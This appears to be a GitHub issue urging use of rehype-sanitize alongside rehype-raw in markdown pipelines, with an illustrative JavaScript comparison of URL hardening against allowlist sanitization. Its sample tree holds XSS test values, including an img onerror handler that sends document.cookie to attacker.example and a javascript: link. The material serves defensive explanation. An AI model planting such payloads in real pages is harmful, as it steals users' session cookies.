
Encourage explicit use of rehype-sanitize (or equivalent) when using rehype-raw or similar plugins #31

@mayank1513

Description

When users combine rehype-raw (or similar plugins that allow embedded HTML) with markdown rendering pipelines, the HTML layer becomes a potential injection vector — even when using hardened markdown renderers like harden-react-markdown.

We should explicitly recommend using [rehype-sanitize](https://github.com/rehypejs/rehype-sanitize) (or equivalent sanitizers) whenever rehype-raw or similar plugins are part of the pipeline.

Why this matters

  • rehype-raw parses and injects raw HTML directly into the tree — this bypasses the markdown-level URL sanitization.
  • Even trusted sources (e.g., LLM-generated markdown) can contain malicious <img> or <iframe> tags that leak data or execute JS under certain integrations.
  • Hardened URL sanitization (like in harden-react-markdown) only covers markdown-originated URLs, not arbitrary inline HTML.

Proposed actions

  1. Update root README’s “Markdown sanitizers” section with a new subsection titled “Important: Use rehype-sanitize if using rehype-raw”.

  2. Add a short warning to the individual package READMEs (harden-react-markdown, rehype-harden-urls) referencing this.

  3. Optionally, provide a minimal secure example:

    import rehypeRaw from 'rehype-raw';
    import rehypeSanitize from 'rehype-sanitize';
    import { rehypeHardenUrls } from 'rehype-harden-urls';
    
    // Order matters: expand the raw HTML first, sanitize the resulting tree,
    // then apply URL hardening to whatever survives.
    const plugins = [
      rehypeRaw,
      rehypeSanitize,
      [rehypeHardenUrls, { allowedProtocols: ['https:', 'mailto:'] }]
    ];
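The following is an added, dependency-free illustration of the point made in the issue above; it is not code from this project, from rehype-raw, rehype-sanitize or rehype-harden-urls, and its schema format and node shapes are a simplified stand-in for hast and for rehype-sanitize's real options. It runs two passes over a constructed tree (a markdown `javascript:` link next to raw-HTML `<iframe>` and `<img onerror>` nodes): a URL-only hardening pass, which drops the bad `href` but leaves the iframe and the event handler in place, and an allowlist sanitizer pass, which removes them. The trailing `img` that points at an allowed `https:` host survives both passes, which is the data-leak case the issue mentions; that needs a host allowlist (hypothetical, not shown here) rather than a protocol allowlist.

```javascript
// Added illustration, not library code: a hast-shaped tree and two passes over it.
const ALLOWED_PROTOCOLS = ['https:', 'mailto:'];

// Scheme of a URL after stripping control characters and whitespace, which
// browsers ignore ("java\nscript:" still runs). Scheme-less URLs return null.
function urlScheme(value) {
  const cleaned = String(value).replace(/[\u0000-\u0020]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() + ':' : null;
}

function urlAllowed(value, protocols) {
  const scheme = urlScheme(value);
  return scheme === null || protocols.includes(scheme);
}

// Pass 1: URL hardening only. Removes href/src with a non-allowlisted scheme
// and touches nothing else: tag names and event-handler attributes survive.
function hardenUrls(node, protocols = ALLOWED_PROTOCOLS) {
  if (node.type === 'element') {
    const props = node.properties || {};
    for (const name of ['href', 'src']) {
      if (name in props && !urlAllowed(props[name], protocols)) delete props[name];
    }
  }
  for (const child of node.children || []) hardenUrls(child, protocols);
  return node;
}

// Pass 2: allowlist sanitizer in the spirit of rehype-sanitize. Toy schema:
// the real package's schema format differs.
const SCHEMA = {
  strip: ['script', 'style', 'iframe', 'object', 'embed'],
  tagNames: ['p', 'a', 'img', 'em', 'strong', 'code', 'ul', 'li'],
  attributes: { a: ['href', 'title'], img: ['src', 'alt'], '*': ['id'] },
  protocols: { href: ALLOWED_PROTOCOLS, src: ['https:'] },
};

function sanitize(node, schema = SCHEMA) {
  if (node.type === 'text') return [node];
  if (node.type === 'root') {
    node.children = node.children.flatMap((c) => sanitize(c, schema));
    return [node];
  }
  // Dangerous containers disappear together with their contents ...
  if (schema.strip.includes(node.tagName)) return [];
  const children = (node.children || []).flatMap((c) => sanitize(c, schema));
  // ... other unknown elements are unwrapped, keeping only sanitized children.
  if (!schema.tagNames.includes(node.tagName)) return children;
  const allowed = [...(schema.attributes[node.tagName] || []), ...(schema.attributes['*'] || [])];
  const properties = {};
  for (const [name, value] of Object.entries(node.properties || {})) {
    if (!allowed.includes(name)) continue; // drops onerror, style, ...
    const protocols = schema.protocols[name];
    if (protocols && !urlAllowed(value, protocols)) continue;
    properties[name] = value;
  }
  return [{ type: 'element', tagName: node.tagName, properties, children }];
}

// Constructed sample standing in for what remark -> rehype-raw would produce
// from markdown that mixes a markdown link with embedded raw HTML.
function sampleTree() {
  const el = (tagName, properties, ...children) => ({ type: 'element', tagName, properties, children });
  const text = (value) => ({ type: 'text', value });
  return {
    type: 'root',
    children: [
      el('p', {}, el('a', { href: 'javascript:alert(1)' }, text('markdown link'))),
      el('p', {}, el('a', { href: 'https://example.com/' }, text('fine link'))),
      el('iframe', { src: 'https://attacker.example/' }), // raw HTML
      el('img', { src: 'https://example.com/x.png', onerror: 'fetch("https://attacker.example/?c=" + document.cookie)' }), // raw HTML
      el('img', { src: 'https://attacker.example/pixel' }), // raw HTML, allowed scheme: survives both passes
    ],
  };
}

// Flatten to "tag[attr,attr]" tokens so the effect of each pass is easy to compare.
function summarize(node, out = []) {
  if (node.type === 'element') out.push(`${node.tagName}[${Object.keys(node.properties || {}).sort().join(',')}]`);
  for (const child of node.children || []) summarize(child, out);
  return out;
}

function afterHardenOnly() { return summarize(hardenUrls(sampleTree())); }
function afterSanitize() { return summarize(sanitize(hardenUrls(sampleTree()))[0]); }

console.log('URL hardening only:', afterHardenOnly().join(' '));
console.log('plus sanitizer:    ', afterSanitize().join(' '));
```

Running it prints the element list after each pass: the first still contains `iframe[src]` and `img[onerror,src]`, the second does not, while the `a[href]` with an `https:` link and the benign-looking `img[src]` pointing at the attacker's host remain in both.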
